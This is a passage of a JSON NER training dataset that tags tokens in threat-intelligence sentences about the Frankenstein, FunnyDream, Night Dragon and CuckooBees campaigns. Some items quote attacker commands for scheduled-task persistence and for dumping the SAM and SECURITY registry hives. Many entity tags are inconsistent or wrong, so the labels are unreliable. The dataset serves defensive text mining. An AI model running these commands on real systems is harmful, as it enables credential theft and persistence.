"of", "a", "malicious", "script,", "which", "revealed", "a", "small", "script", "designed", "to", "obtain", "an", "additional", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "collected", "information", "via", "Empire,", "which", "sent", "the", "data", "back", "to", "the", "adversary's", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "exploited", "CVE-2017-11882", "to", "execute", "code", "on", "the", "victim's", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "downloaded", "files", "and", "tools", "onto", "a", "victim", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "MSbuild", "to", "execute", "an", "actor-created", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "relied", "on", "a", "victim", "to", "enable", "macros", "within", "a", "malicious", "Microsoft", "Word", "document", "likely", "sent", "via", "email." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "named", "a", "malicious", "scheduled", "task", "\"WinUpdate\"", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "PowerShell", "to", "run", "a", "series", "of", "Base64-encoded", "commands", "that", "acted", "as", "a", "stager", "and", "enumerated", "hosts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Empire", "to", "obtain", "a", "list", "of", "all", "running", "processes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "established", "persistence", "through", "a", "scheduled", "task", "using", "the", "command:", "`/Create", "/F", "/SC", "DAILY", "/ST", "09:00", "/TN", "WinUpdate", "/TR`,", "named", "\"WinUpdate\"" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-Way" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "WMI", "queries", "to", "determine", "if", "analysis", "tools", "were", "running", "on", "a", "compromised", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "likely", "used", "spearphishing", "emails", "to", "send", "malicious", "Microsoft", "Word", "documents." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "communicated", "with", "C2", "via", "an", "encrypted", "RC4", "byte", "stream", "and", "AES-CBC." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "a", "script", "that", "ran", "WMI", "queries", "to", "check", "if", "a", "VM", "or", "sandbox", "was", "running,", "including", "VMWare", "and", "Virtualbox.", "The", "script", "would", "also", "call", "WMI", "to", "determine", "the", "number", "of", "cores", "allocated", "to", "the", "system;", "if", "less", "than", "two", "the", "script", "would", "stop", "execution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Empire", "to", "obtain", "the", "compromised", "machine's", "name." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Empire", "to", "find", "the", "public", "IP", "address", "of", "a", "compromised", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Empire", "to", "enumerate", "hosts", "and", "gather", "username,", "machine", "name,", "and", "administrative", "permissions", "information." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "trojanized", "documents", "that", "retrieved", "remote", "templates", "from", "an", "adversary-controlled", "website." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Frankenstein,", "the", "threat", "actors", "obtained", "and", "used", "Empire." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Word", "documents", "that", "prompted", "the", "victim", "to", "enable", "macros", "and", "run", "a", "Visual", "Basic", "script." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "HTTP", "GET", "requests", "for", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "ran", "a", "command", "script", "to", "set", "up", "persistence", "as", "a", "scheduled", "task", "named", "\"WinUpdate\",", "as", "well", "as", "other", "encoded", "commands", "from", "the", "command-line" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "WMI", "queries", "to", "check", "if", "various", "security", "applications", "were", "running", "as", "well", "as", "to", "determine", "the", "operating", "system", "version." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "7zr.exe", "to", "add", "collected", "files", "to", "an", "archive." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "FunnyDream,", "the", "threat", "actors", "registered", "a", "variety", "of", "domains." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "FunnyDream,", "the", "threat", "actors", "likely", "established", "an", "identified", "email", "account", "to", "register", "a", "variety", "of", "domains", "that", "were", "used", "during", "the", "campaign." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "downloaded", "additional", "droppers", "and", "backdoors", "onto", "a", "compromised", "system." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "For", "FunnyDream,", "the", "threat", "actors", "used", "a", "new", "backdoor", "named", "FunnyDream." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "Tasklist", "on", "targeted", "systems." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "several", "tools", "and", "batch", "files", "to", "map", "victims'", "internal", "networks." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "Systeminfo", "to", "collect", "information", "on", "targeted", "hosts." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "ipconfig", "for", "discovery", "on", "remote", "systems." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "netstat", "to", "discover", "network", "connections", "on", "remote", "systems." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "FunnyDream,", "the", "threat", "actors", "used", "a", "modified", "version", "of", "the", "open", "source", "PcShare", "remote", "administration", "tool." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "a", "Visual", "Basic", "script", "to", "run", "remote", "commands." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "`cmd.exe`", "to", "execute", "the", "wmiexec.vbs", "script." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "During", "FunnyDream,", "the", "threat", "actors", "used", "`wmiexec.vbs`", "to", "run", "remote", "commands." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "the", "threat", "actors", "collected", "files", "and", "other", "data", "from", "compromised", "systems." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "disabled", "anti-virus", "and", "anti-spyware", "tools", "in", "some", "instances", "on", "the", "victim’s", "machines.", "The", "actors", "also", "disabled", "proxy", "settings", "to", "allow", "direct", "communication", "from", "victims", "to", "the", "Internet." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "domain", "accounts", "to", "gain", "further", "access", "to", "victim", "systems." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "B-Tool", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "dynamic", "DNS", "services", "for", "C2." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "a", "DLL", "that", "included", "an", "XOR-encoded", "section." ], "ner_tags": [ "O", "I-HackOrg", "O", "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "SQL", "injection", "exploits", "against", "extranet", "web", "servers", "to", "gain", "access." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "B-Features", "B-Way", "B-Exp", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "compromised", "VPN", "accounts", "to", "gain", "access", "to", "victim", "systems." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "I-Tool", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "company", "extranet", "servers", "as", "secondary", "C2", "servers." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "zwShell", "to", "establish", "full", "remote", "control", "of", "the", "connected", "machine", "and", "browse", "the", "victim", "file", "system." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "administrative", "utilities", "to", "deliver", "Trojan", "components", "to", "remote", "systems." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "RAT", "malware", "to", "exfiltrate", "email", "archives." ], "ner_tags": [ "O", "I-HackOrg", "O", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "enticed", "users", "to", "click", "on", "links", "in", "spearphishing", "emails", "to", "download", "malware." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "Trojans", "from", "underground", "hacker", "websites." ], "ner_tags": [ "O", "I-HackOrg", "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "zwShell", "to", "establish", "full", "remote", "control", "of", "the", "connected", "machine", "and", "manipulate", "the", "Registry." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "pass-the-hash", "tools", "to", "obtain", "authenticated", "access", "to", "sensitive", "internal", "desktops", "and", "servers." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "Cain", "&", "Abel", "to", "crack", "password", "hashes." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "several", "remote", "administration", "tools", "as", "persistent", "infiltration", "channels." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "copied", "files", "to", "company", "web", "servers", "and", "subsequently", "downloaded", "them." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "dumped", "account", "hashes", "using", "gsecdump." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "purchased", "hosted", "services", "to", "use", "for", "C2." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "compromised", "web", "servers", "to", "use", "for", "C2." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "software", "packing", "in", "its", "tools." ], "ner_tags": [ "O", "I-HackOrg", "O", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "sent", "spearphishing", "emails", "containing", "links", "to", "compromised", "websites", "where", "malware", "was", "downloaded." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "password", "cracking", "and", "pass-the-hash", "tools", "to", "discover", "usernames", "and", "passwords." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "obtained", "and", "used", "tools", "such", "as", "gsecdump." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "uploaded", "commonly", "available", "hacker", "tools", "to", "compromised", "web", "servers." ], "ner_tags": [ "O", "I-HackOrg", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "compromised", "VPN", "accounts", "to", "gain", "access", "to", "victim", "systems." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "I-Tool", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "Night", "Dragon,", "threat", "actors", "used", "zwShell", "to", "establish", "full", "remote", "control", "of", "the", "connected", "machine", "and", "run", "command-line", "shells." ], "ner_tags": [ "O", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "Makecab", "utility", "to", "compress", "and", "a", "version", "of", "WinRAR", "to", "create", "password-protected", "archives", "of", "stolen", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "executed", "an", "encoded", "VBScript", "file." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "legitimate", "Windows", "services", "`IKEEXT`", "and", "`PrintNotify`", "to", "side-load", "malicious", "DLLs." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "collected", "data,", "files,", "and", "other", "information", "from", "compromised", "networks." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`dsquery`", "and", "`dsget`", "commands", "to", "get", "domain", "environment", "information", "and", "to", "query", "users", "in", "administrative", "groups." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "B-Org", "O", "O", "O", "B-Org" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "compromised", "domain", "administrator", "credentials", "as", "part", "of", "their", "lateral", "movement." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "exploited", "multiple", "vulnerabilities", "in", "externally", "facing", "servers." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "enabled", "WinRM", "over", "HTTP/HTTPS", "as", "a", "backup", "persistence", "mechanism", "using", "the", "following", "command:", "`cscript", "//nologo", "\"C:\\Windows\\System32\\winrm.vbs\"", "set", "winrm/config/service@{EnableCompatibilityHttpsListener=\"true\"}`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "`dir", "c:\\\\`", "to", "search", "for", "files." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "stroed", "payloads", "in", "Windows", "CLFS", "(Common", "Log", "File", "System)", "transactional", "logs." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "attackers", "used", "a", "signed", "kernel", "rootkit", "to", "establish", "additional", "persistence." ], "ner_tags": [ "O", "I-OffAct", "O", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "user`", "command", "to", "gather", "account", "information." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "group`", "command", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "renamed", "a", "malicious", "executable", "to", "`rundll32.exe`", "to", "allow", "it", "to", "blend", "in", "with", "other", "Windows", "system", "files." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "share`", "command", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "accounts`", "command", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`fsutil", "fsinfo", "drives`", "command", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`tasklist`", "command", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "view`", "and", "`ping`", "commands", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "scheduled", "tasks", "to", "execute", "batch", "scripts", "for", "lateral", "movement", "with", "the", "following", "command:", "`SCHTASKS", "/Create", "/S", "<IP", "Address>", "/U", "<Username>", "/p", "<Password>", "/SC", "ONCE", "/TN", "test", "/TR", "<Path", "to", "a", "Batch", "File>", "/ST", "<Time>", "/RU", "SYSTEM.`" ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "leveraged", "a", "custom", "tool", "to", "dump", "OS", "credentials", "and", "used", "following", "commands:", "`reg", "save", "HKLM\\\\SYSTEM", "system.hiv`,", "`reg", "save", "HKLM\\\\SAM", "sam.hiv`,", "and", "`reg", "save", "HKLM\\\\SECURITY", "security.hiv`,", "to", "dump", "SAM,", "SYSTEM", "and", "SECURITY", "hives." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`systeminfo`", "command", "to", "gather", "details", "about", "a", "compromised", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "`ipconfig`,", "`nbtstat`,", "`tracert`,", "`route", "print`,", "and", "`cat", "/etc/hosts`", "commands." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "session`,", "`net", "use`,", "and", "`netstat`", "commands", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`query", "user`", "and", "`whoami`", "commands", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "start`", "command", "as", "part", "of", "their", "initial", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "used", "the", "`net", "time`", "command", "as", "part", "of", "their", "advanced", "reconnaissance." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "CuckooBees,", "the", "threat", "actors", "obtained", "publicly-available", "JSP", "code", "that", "was", "used", "to", "deploy", "a", "webshell", "onto", "a", "compromised", "server." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "CuckooBees,", "the", "threat", "actors", "executed", "an", "encoded", "VBScript", "file", "using", "`wscript`", 